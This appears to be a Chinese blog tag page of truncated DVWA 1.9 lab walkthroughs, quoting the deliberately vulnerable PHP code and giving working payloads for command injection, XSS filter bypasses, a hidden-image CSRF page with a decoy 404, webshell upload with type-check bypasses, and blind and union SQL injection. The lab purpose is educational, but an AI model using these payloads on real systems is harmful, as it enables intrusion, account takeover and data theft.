Tag:dvwa

Tag (dvwa)'s result:

dvwa1.9之Command Injection

Low: 源码: <?php if( isset( $_POST[ ‘Submit’ ] ) ) { // Get input $target = $_REQUEST[ ‘ip’ ]; // Determine OS and execute the ping command. if( stristr( php_uname( ‘s’ ), ‘Windows NT’ ) ) { // Windows $cmd = shell_exec( ‘ping ‘ . $target ); } else { // *nix $cmd = shell_exec( ‘ping -c 4 ‘ . $target ); } // Feedback for the end user echo “<pre>{$cmd}</pre>”; } ?> 对参数ip没任何过滤 127.0.0.1&&net user   Medium: 源码: <?php if( isset( $_POST[ ‘Submit’ ] ) ) { // Get input $target = $_REQUEST[ ‘ip’ ]; // Set blacklist $substitutions = array( ‘&&’ => ”, ‘;’ => ”, ); // Remove any of the charactars in the array (blacklist). $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); // Determine OS and execute the ping command. if( stristr( php_uname( ‘s’ ), ‘Windows NT’ ) ) { // Windows $cmd = shell_exec( ‘ping ‘ . $target ); } else { // *nix $cmd = shell_exec( ‘ping -c 4 ‘ . $target );……

dvwa1.9之brute force

Low: 源码: <?php if( isset( $_GET[ ‘Login’ ] ) ) { // Get username $user = $_GET[ ‘username’ ]; // Get password $pass = $_GET[ ‘password’ ]; $pass = md5( $pass ); // Check the database $query = “SELECT * FROM `users` WHERE user = ‘$user’ AND password = ‘$pass’;”; $result = mysql_query( $query ) or die( ‘<pre>’ . mysql_error() . ‘</pre>’ ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, “avatar” ); // Login successful echo “<p>Welcome to the password protected area {$user}</p>”; echo “<img src=\”{$avatar}\” />”; } else { // Login failed echo “<pre><br />Username and/or password incorrect.</pre>”; } mysql_close(); } ?> 没有任何防爆破机制,还有SQL注入漏洞 直接burpsuite爆破密码   Medium: 源码: <?php if( isset( $_GET[ ‘Login’ ] ) ) { // Sanitise username input $user = $_GET[ ‘username’ ]; $user = mysql_real_escape_string( $user ); // Sanitise password input $pass = $_GET[ ‘password’ ]; $pass = mysql_real_escape_string( $pass ); $pass = md5( $pass ); // Check the database $query = “SELECT *……

dvwa1.9之CSRF

Low: 源码: <?php if( isset( $_GET[ ‘Change’ ] ) ) { // Get input $pass_new = $_GET[ ‘password_new’ ]; $pass_conf = $_GET[ ‘password_conf’ ]; // Do the passwords match? if( $pass_new == $pass_conf ) { // They do! $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); // Update the database $insert = “UPDATE `users` SET password = ‘$pass_new’ WHERE user = ‘” . dvwaCurrentUser() . “‘;”; $result = mysql_query( $insert ) or die( ‘<pre>’ . mysql_error() . ‘</pre>’ ); // Feedback for the user echo “<pre>Password Changed.</pre>”; } else { // Issue with passwords matching echo “<pre>Passwords did not match.</pre>”; } mysql_close(); } ?> 无任何CSRF防护,直接构造链接让人点 www.website.com/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change# 成功修改密码! 这链接有两个弊端: 1.太明显……. 2.会出现password change页面 优化:短网址 上面长网址可以压缩为http://t.cn/RSmyVRE 第二点弊端还存在 继续优化:先在公网上传一个攻击页面,诱骗受害者去访问,在受害者不知情的情况下完成CSRF攻击。 html攻击页面: <img src=”http://www.website.com/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#” border=”0″ style=”display:none;”/> <h1>404<h1> <h2>file not found.<h2> 受害者点击后显示404(500,503,403都ok),但是密码已经改了。   Medium: 源码: <?php if( isset( $_GET[ ‘Change’ ] ) ) { // Checks to see where the request came from if( eregi( $_SERVER[ ‘SERVER_NAME’ ], $_SERVER[ ‘HTTP_REFERER’ ] ) ) { // Get input $pass_new = $_GET[ ‘password_new’ ]; $pass_conf = $_GET[……

dvwa1.9之XSS(stored)

Low: 源码: <?php if( isset( $_POST[ ‘btnSign’ ] ) ) { // Get input $message = trim( $_POST[ ‘mtxMessage’ ] ); $name = trim( $_POST[ ‘txtName’ ] ); // Sanitize message input $message = stripslashes( $message ); $message = mysql_real_escape_string( $message ); // Sanitize name input $name = mysql_real_escape_string( $name ); // Update database $query = “INSERT INTO guestbook ( comment, name ) VALUES ( ‘$message’, ‘$name’ );”; $result = mysql_query( $query ) or die( ‘<pre>’ . mysql_error() . ‘</pre>’ ); //mysql_close(); } ?> 没有任何针对XSS的防护,直接<script>alert(/xss/)</script> name有前端字符限制 maxlength=”10” 可以抓包修改。 Midume: 源码: <?php if( isset( $_POST[ ‘btnSign’ ] ) ) { // Get input $message = trim( $_POST[ ‘mtxMessage’ ] ); $name = trim( $_POST[ ‘txtName’ ] ); // Sanitize message input $message = strip_tags( addslashes( $message ) ); $message = mysql_real_escape_string( $message ); $message = htmlspecialchars( $message ); // Sanitize name input $name = str_replace( ‘<script>’, ”, $name ); $name = mysql_real_escape_string( $name ); // Update database $query = “INSERT INTO guestbook ( comment, name ) VALUES ( ‘$message’, ‘$name’ );”;……

dvwa1.9之XSS(reflected)

Low: 源码: <?php // Is there any input? if( array_key_exists( “name”, $_GET ) && $_GET[ ‘name’ ] != NULL ) { // Feedback for end user echo ‘<pre>Hello ‘ . $_GET[ ‘name’ ] . ‘</pre>’; } ?> 无任何防护,直接<script>alert(/xss/)</script>弹窗   Medium: 源码: <?php // Is there any input? if( array_key_exists( “name”, $_GET ) && $_GET[ ‘name’ ] != NULL ) { // Get input $name = str_replace( ‘<script>’, ”, $_GET[ ‘name’ ] ); // Feedback for end user echo “<pre>Hello ${name}</pre>”; } ?> str_replace过滤了<script> 方法1:大小写绕过<sCript>alert(/xss/)</scRipt> 方法2:重写绕过<sc<script>ript>alert(/xss/)</script>   High: 源码: <?php // Is there any input? if( array_key_exists( “name”, $_GET ) && $_GET[ ‘name’ ] != NULL ) { // Get input $name = preg_replace( ‘/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i’, ”, $_GET[ ‘name’ ] ); // Feedback for end user echo “<pre>Hello ${name}</pre>”; } ?> preg_replace正则过滤了script,同时过滤了大小写,重写,不过只过滤了script,所以可以换一个触发条件(条件千千万万) payload:<img src=1 onerror=alert(/xss/)>   Impossible: 源码: <?php // Is there any input? if( array_key_exists( “name”, $_GET ) && $_GET[ ‘name’ ] != NULL ) { // Check Anti-CSRF token checkToken( $_REQUEST[ ‘user_token’ ], $_SESSION[ ‘session_token’ ], ‘index.php’ ); // Get……

dvwa1.9之File upload

Low: 关键源码: // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . “hackable/uploads/”; $target_path .= basename( $_FILES[ ‘uploaded’ ][ ‘name’ ] ); // Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ ‘uploaded’ ][ ‘tmp_name’ ], $target_path ) ) { // No echo ‘<pre>Your image was not uploaded.</pre>’; } else { // Yes! echo “<pre>{$target_path} succesfully uploaded!</pre>”; 上传漏洞要能成功上传,成功执行脚本,成功获取地址,low级别完全无防护。直接上传php一句话即可getshell。   Medium 关键源码: $target_path = DVWA_WEB_PAGE_TO_ROOT . “hackable/uploads/”; $target_path .= basename( $_FILES[ ‘uploaded’ ][ ‘name’ ] ); // File information $uploaded_name = $_FILES[ ‘uploaded’ ][ ‘name’ ]; $uploaded_type = $_FILES[ ‘uploaded’ ][ ‘type’ ]; $uploaded_size = $_FILES[ ‘uploaded’ ][ ‘size’ ]; // Is it an image? if( ( $uploaded_type == “image/jpeg” || $uploaded_type == “image/png” ) && ( $uploaded_size < 100000 ) ) { 审计源码可知对文件大小和类型作了限制。一句话符合<100000,类型可以抓包修改后缀绕过。 方法1:上传conn.php一句话木马,抓包修改成image/jpeg类型,C刀连接,亲测成功。 方法2:上传conn1.png一句话图片马,抓包修改成conn1.php,C刀连接,亲测成功。 方法3:利用medium级别文件包含漏洞,包含上传的一句话图片马,再用C刀连接,未测试。 方法4:00截断,构造conn1.php%00.png,需要php版本小于5.3.4的服务器中,且Magic_quote_gpc选项为off,未测试。   High: 关键源码: // File information $uploaded_name = $_FILES[ ‘uploaded’ ][ ‘name’ ]; $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, ‘.’ ) + 1); $uploaded_size = $_FILES[ ‘uploaded’ ][ ‘size’ ]; $uploaded_tmp = $_FILES[ ‘uploaded’ ][ ‘tmp_name’ ];……

dvwa1.9之SQL injection(blind)

low: 关键源码: $id = $_GET[ ‘id’ ]; // Check database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’;”; $result = mysql_query( $getid ); // Removed ‘or die’ to suppress mysql errors 1.判断: 输入:1′ and 1=1;# 显示:User ID exists in the database. 输入:1′ and 1=2;# 显示:User ID is MISSING from the database. 可得是字符型注入 2.猜解当前数据库信息: 判断数据库长度: 输入:1′ and length(database())=1;# 显示:User ID is MISSING from the database. 输入: 显示:User ID exists in the database. 数据库名长度16. 猜解库名: 输入:1′ and ascii(substr(databse(),1,1))>97;# 显示:User ID is MISSING from the database. 输入:1′ and ascii(substr(databse(),1,1))<117;# 显示:User ID exists in the database. 就这样用二分法一直猜出库名。 3.猜表名: 输入:1′ and (select count (table_name) from information_schema.tables where table_schema=database() )=2;# 显示:User ID exists in the database. 可得数据库有2张表 输入:1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9;# 显示:User ID exists in the database. 可得第一张表名长度9 输入:1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103;# 显示:User ID is MISSING from the database. 输入:1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103;# 显示:User ID is MISSING from the database. 可得第一张表名第一个字符为g,继而可得表名。 4.猜字段信息 输入:1’ and (select……

dvwa1.9之SQL injection

low: 关键源码: $id = $_REQUEST[ ‘id’ ]; // Check database $query = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’;”; 没有任何过滤,并且是字符型注入,但是源码一般是看不了的,所以要进行测试判断是什么类型。 (1)判断注入类型 尝试:1 or 1=1;# 返回: ID: 1 or 1=1;# First name: admin Surname: admin 尝试:1′ or 1=1;# 返回: ID: 1′ or 1=1;# First name: admin Surname: admin ID: 1′ or 1=1;# First name: Gordon Surname: Brown ID: 1′ or 1=1;# First name: Hack Surname: Me ID: 1′ or 1=1;# First name: Pablo Surname: Picasso ID: 1′ or 1=1;# First name: Bob Surname: Smith 字符型注入。 (2)判断列数(字段数) 尝试:1′ order by 2;# 返回: ID: 1′ order by 2;# First name: admin Surname: admin 尝试:1′ order by 3;# 返回: Unknown column ‘3’ in ‘order clause’ 列数 2 (3)曝显示位 尝试:1′ union select 1,2;# 返回: ID: 1′ union select 1,2;# First name: admin Surname: admin ID: 1′ union select 1,2;# First name: 1 Surname: 2 利用显示位查询数据库信息和当前用户: 尝试:1′ union select database(),current_user();# 返回: ID: 1′ union select database(),current_user();# First name: admin Surname: admin ID: 1′ union select database(),current_user();# First name: nhbgtfzt_othpene Surname: nhbgtfzt_lsa@localhost (4)查询所有的表 由于mysql>5,所以可以利用information_schema。 尝试:1′……